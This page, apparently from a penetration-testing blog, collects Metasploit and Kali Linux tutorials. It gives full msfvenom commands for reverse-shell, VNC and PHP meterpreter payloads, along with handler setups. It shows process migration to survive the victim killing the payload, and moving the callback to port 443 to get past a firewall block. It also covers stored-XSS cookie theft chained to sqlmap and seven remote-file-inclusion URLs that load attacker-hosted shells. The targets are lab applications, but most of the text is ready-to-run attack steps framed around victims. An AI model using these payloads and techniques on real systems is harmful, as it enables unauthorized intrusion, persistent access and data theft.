Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

Run OS Command in Multiple Session in Metasploit

Again we are sharing our experience with our visitors to enhance their skills and ability. In this article you will learn how to manage multiple sessions of different targets in a network. Once you hacked more than one system in a network and received multiple meterepreter session in your Kali Linux then how will you retrieve data simultaneously from all targets.

 LET’s PROCEED!!!
First an attacker needs to create a payload and share it in the network with his targets, then start multi handler in metasploit framework. Now when the available targets will open the payload in their system, the attacker will receive the series of sessions.

Here you can see from given screenshot I have receive two sessions from different system.

msf exploit(handler) > sessions


In order to gather the information from both targeted system simultaneously I had used post exploitation which let an attack to execute same command for multiple sessions at a time.

This module executes an arbitrary command line
msf exploit(handler) > use post/multi/general/execute
msf post(execute) > set command ipconfig
msf post(execute) > set session 1
msf post(execute) >exploit

In given screenshot you can see I have executed ipconfig to know the network configuration for session 1 and here the target IP is 192.168.0.100 as result.


Then in next step I just need to change session from 1 into 2 so that I can know network configuration for session 2 also and here the target IP is 192.168.0.105 as result.

msf post(execute) > set session  2
msf post(execute) >exploit

Hiding Shell with Prepend Migrate using Msfvenom

If you are a network penetration tester then you must read this article to enhance your skill. It is the part of advance penetration testing which might help in creating a strong payload for an attack to the targeted system. In this article your will learn more about the strength of msfvenom, here we will create such a payload which is different from my previous tutorial. The payload migrate its process if current process gets killed hence attacker will not lose his session if victim kills the current process ID of the payload from its system.

LETS!!! START
Open the terminal in kali Linux and type following command to generate exe payload.
Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe
Above command will create the raj.exe file on the Desktop now send this file to remote system for attack


Load metasploit framework and type following command to start the attack.
msfconsole
use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit

When victim will open raj.exe file we will get meterpreter session.

meterpreter> sysinfo


Now let check the process ID of our payload.
meterpreter> ps
From the highlighted text you can read the process ID shown for raj.exe i.e. 4960.


Now attacker tries himself to kill the current process state for raj.exe to verify process migration, as result process 4960 get killed.
meterpreter> kill 4960

But!!!  Still we have victim’s session which means raj.exe file migrate into new process ID.
meterpreter> sysinfo

Shell to Meterpreter using Session Command

In previous article we have seen how to upgrade a command shell into meterpreter using Post exploitation in metasploit. Again we are going to perform same task using a different technique.

LETS BEGIN!!!
msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.


Once you got the reverse connection of remote system and access its command shell through metasploit now you can manipulate your active sessions.  You just need to type sessions –h as command inside metasploit, this help command will display the multiple option which can be utilized with active session.
msf auxiliary(telnet_login) >sessions –h

So in the following screenshot you can perceive that the highlighted option is used to upgrade a command shell into meterpreter session.


Since we have command shell so here we can use “-u” (option) with session ID for upgrading our shell into meterpreter session. Execute following command for session manipulation.
msf auxiliary(telnet_login) >sessions –u 1

When you will execute above command you will get meterpreter session as session 2. Now enjoy your meterpreter session and execute its command.
msf auxiliary(telnet_login) >sessions

Capture VNC Session of Remote PC using Msfvenom

Today in this article we’ll try to compromise the target using VNCpayload. In this tutorial you’ll learn how to create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.
Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.

Msfvenom –p windows/vncinject/reverse_tcp lhost=192.168.1.15 lport=4444 –f exe > /root/Desktop/vnc.exe


Now the above command will generate an exe file for the VNC payload on the desktop of Kali Linux. Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.


msfconsole
use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit


Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.


How to Upgrade Shell to Meterpreter

In network penetration testing, we always wish to hack a system of an internal network and try to make an unauthorized access through meterpreter session using metasploit framework.  But there are some exploits which provides directly victim’s command shell instead of meterpreter session. In this article we have tried to upgrade from victim’s shell to meterpreter shell.

In previous article we had discussed related to how to access victim’s shell. Now once you have access victims command shell then follow the given below step to upgrade a command shell into meterepreter shell.

Here I have already access command shell of victim’s Pc
msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.


This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently meterpreter/reverse_tcp is used on Windows and Linux, with python/meterpreter/reverse_tcp' used on all others.
use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set session 1
msf post(shell_to_meterpreter) > exploit


Let’s verify the TYPE for session 2
msf post(shell_to_meterpreter) >sessions
Now have a look over last image which is showing the new session i.e. session 2 is a meterpreter session.

How to set and Bypass Outbound Rule in Windows Firewall using Metasploit

In previous the firewall penetration testing article you might have read how firewall is used for blocking any particular port in a network to prevent hackers or malicious software from gaining access to your PC. This article is written to describe that how an attacker can bypass firewall rules and try to make unauthorized access of victim’s PC.

Target: windows PC
Attacker: Kali Linux

Lets start!!!

Open window firewall control panel and select Advance setting to configure firewall rules as shown in screenshot.


Go to outbound rules to configure new rule for firewall to add security layer in network to secure it form attackers.


Select the type of firewall rule to be created click radio button for option Port that controls connections for a TCP and UDP port then click on next.


Now specify the protocol and port to which rule is applies therefore I choose TCP and then specify port 4444 on which this rule will applies and then click on next.

 Select radio button for block the connection when connection matches to the condition specified condition.


Select all check boxes when this rule applies.


Here give the name to your own specified rule.  You can see in the screenshot I had named it block port 4444 and then click on finished.


Here you can see the new outbound rule is added into the list of outbound rules. Hence victim has defense himself from establishing connection with port 4444, now if attacker try to connect with victim through port 4444 then it might be possible that attacker doesn’t receive any reverse connection.


Now let’s examine when an attacker tries to send malicious file using port 4444, will it work or not. Does attacker able to receive reverse connection of victim’s pc?

Here I have generated a malicious file using msfvenom in the format of .exe file and then send this 4444.exe file to victim and start multi handler at background.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f exe > /root/Desktop/4444.exe

Now let’s find whether we will succeed or get failed to achieve reverse connection of victims PC.


use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.102
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

OOPS!!!  No response
It means we get failed in establishing connection between victim and attacker. Now as we know victim has protected himself from connecting with port 4444.


Now whenever you face such type of restriction for establishing connection with victim then do not get disappoint think twice what is the aim of an attack? He only wants to trap victim and want to establish a connection.

Now send your malicious file on those ports which always left open for incoming and outgoing connection.  For example port 80, port 443, port 445 and etc.

When again an attacker tries to send malicious file using port 443. Does attacker able to receive reverse connection of victim’s pc?

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.102 lport=443 -f exe > /root/Desktop/443.exe

 Start multi handler and send 443.exe to victim.


use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
msf exploit(handler) > set lhost 192.168.1.102
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

GREAT!!!  Attack is successful
We successfully got meterpreter session of victim’s PC inside the metasploit framework.

Stored XSS Exploitation in DVWA (Beginner Guide)

This article is written to bring awareness among all security researchers and developers so that they may be able to learn the level of damage cause by XSS attack if the web server is suffering from cross site scripting vulnerability.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. 

Stored XSS (Persistent or Type I)
Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. With the advent of HTML5, and other browser technologies, we can envision the attack payload being permanently stored in the victim’s browser, such as an HTML5 database, and never being sent to the server at all.
Refernce: owasp.org
Lets start!!!
Attacker: Kali Linux
Target: DVWA


For this tutorial I had targeted DVWA and explore localhost IP in browser; now login with admin: password and select the stored cross site scripting vulnerbility from given list of vulnerbility.


Now have a look over a small script which would generate an alert window. So in the text area given for message I will inject the script which get store in the server.


Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.

This was a small demo to show how to inject any script if server is suffering from XSS and further you will learn what else an attacker can do to cause damage inside a web application server.


If attack is aware that the web server is having XSS then he might think to steal the web cookies which contain session Id therefore he will generate a script to fetch running cookies.
In following screenshot you can see I have injected the script to get web page cookies.



Here in given below image when I have executed the script I have successfully fetched the browser cookies and now further I will use this cookies for retrieving the data of web application server. 


SQL INJECTION WITH XSS

It might be possible that the web application server has more than one vulnerabilities, let assume if it is also having SQL injection vulnerability then it become very easy for attacker to retrieve the data from its database using stolen cookies.

For example in DVWA I switch from XSS to SQL injection; now copy its URL with user ID=1.


From above we have browser cookie and target URL for making SQL injection attack. Now open the terminal in your kali Linux and use above cookie and URL inside the command of sqlmap as shown in screenshot
Sqlmap – u “http://192.168.1.8/dvwa/vulnerbilities/sqli/?id=1&submit=submit” –cookie=“security=low; PHPSESSID=r12pk67cuq3s7eo4iktb88sud2” –dbs --batch


Hence you can see it has fetched all present database names inside database system.

Gaining Shell Access with XSS
Now let assume if server is suffering from XSS as well as file uploading both vulnerabilities; in this case how an attacker would be able to cause harm to the web application server.

Firstly let’s prepare our malicious PHP file for uploading in web server. As we always use msfvenom for this purpose and then save the generated PHP codes in a text file as shell.php

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 –f raw


Again I switched to file uploading vulnerability in DVWA to upload shell.php and from screenshot you can see our shell.php file is successfully uploaded now copy the highlighted path.


Start multi handler inside the metasploit framework.


Here the text area given for message length is not sufficient to inject our next script therefore make right click on window and select inspect element to view it’s given message length for text area.


Here you can see message length for text area is decided as “50”.


Change message length from “50 to 500” so that it becomes easy to inject our next script.


Now in following screenshot you can see I have injected the path of uploaded file in script which will get saved in the server. When user click on it to read the message he will execute our shell.php file which provide reverse connection on attacker machine.


Here you can see as soon as script will execute it has shown meterpreter session for victim’s PC.
Meterpreter>sysinfo

7 ways to Exploit RFI Vulnerability

In this article you will learn how to hack any web application server if it is suffering from remote file inclusion vulnerability.  I have performed RFI attack using seven different techniques to exploit any web server. Here I have targeted BWAPP which a buggy web application server to perform all these attack.

Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.
For more details visit OWASP.org


Let’s Begin!!!

Basic RFI Attack


Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which is suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, when you click on go button the selected language file get included in URL.

 Now prepare PHP malicious file using msfvenom for attack and start multi handler at the background.
Msfvenom –p php/meterpreter/reverse _tcp lhost= 192.168.1.11 lport 4444 –f raw
Then copy the highlighted text in a text file.



If you notice the below screenshot carefully here you will find that I have saved above copied PHP code as shell.php inside /var/www/html, so that shell.php file could be included for RFI attack.


To perform basic attacks manipulate URL to include php file remotely.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php


As soon as you will execute the URL, you will get reverse connection through meterpreter session.
Meterpreter> sysinfo


Forced Extension RFI Attack
Repeat the same process and add ‘?’ (Question mark) symbol at the end of URL. Must remember that multi handler should be running at the background of metasploit framework.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.php?


Again when you will execute URL, it will give you another meterpreter session.
Meterpreter> sysinfo


Null Byte RFI Attack

Now to make null byte attack you need to capture the sending request between browser and web server. Here to perform the attack with help of burp suite kindly turn on burp suite then make intercept on and set browser proxy. From given screenshot you can see I have captured the GET request.


Again if you notice the highlighted text in the given below image you will find that I have edited ‘ (null character) to make null injection attack. Now before forwarding the GET request make sure your multi handler must be running at the background and then click on forward tab.


As soon as they GET request will be forward you will get victim’s reverse connection through meterpreter sessions.
Meterpreter> sysinfo


Change HTTP

The forth technique is similar to the first technique the attacker just need to make very small change in URL and if you notice the following screenshot you will find that I have changed http into HTTP. It might be possible that in some situation when security level get increased small character http get failed to include file remotely. 
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=HTTP://192.168.1.11/shell.php


So after making changes now execute the URL and must keep multi handler running at the background which will further provide a new session again through meterpreter.
Meterpreter> sysinfo


Change Image Extension
In next attack you will find that I had included an image remotely to hack web application server which is not a real image but our php malicious file. So now open your shell.php file and edit GIF98 inside your PHP file as shown in following screenshot and save it as shell.gif at same location i.e. /var/www/html.


Here again make small change in URL to include malicious image.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.gif


Now when again you will execute URL, another meterpreter session gets open for you.
Meterpreter> sysinfo


Black List RFI Attack

If you have read  file uploading article you must be aware of black list where we can inject our file by changing a number of letters to their capital forms to bypass the case sensitive rule, for example PHP or PHP3

You can apply this technique when security level is high, manipulate .php into .PHP; I have renamed shell.php into shell.PHP at same location and then execute shell.PHP with help of URL.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go into192.168.1.11/bWAPP/flfi.php? language=http://192.168.1.11/shell.PHP


From following screenshot you can see I have got another session through meterpreter.
Meterpreter> sysinfo


Base64 encoded
 Now there is another way to exploit RFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.

With help of hackbar which a Firefox plug-in I had performed this attack. First you need to load URL then manipulate URL as shown in the screenshot then click on execute tab.

http://192.168.1.113/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource= http://192.168.1.11/shell.php


WONDERFUL!!! We have got meterpreter session through seven different techniques. You can also perform all these attack using online script like c99 shell.
Meterpreter> sysinfo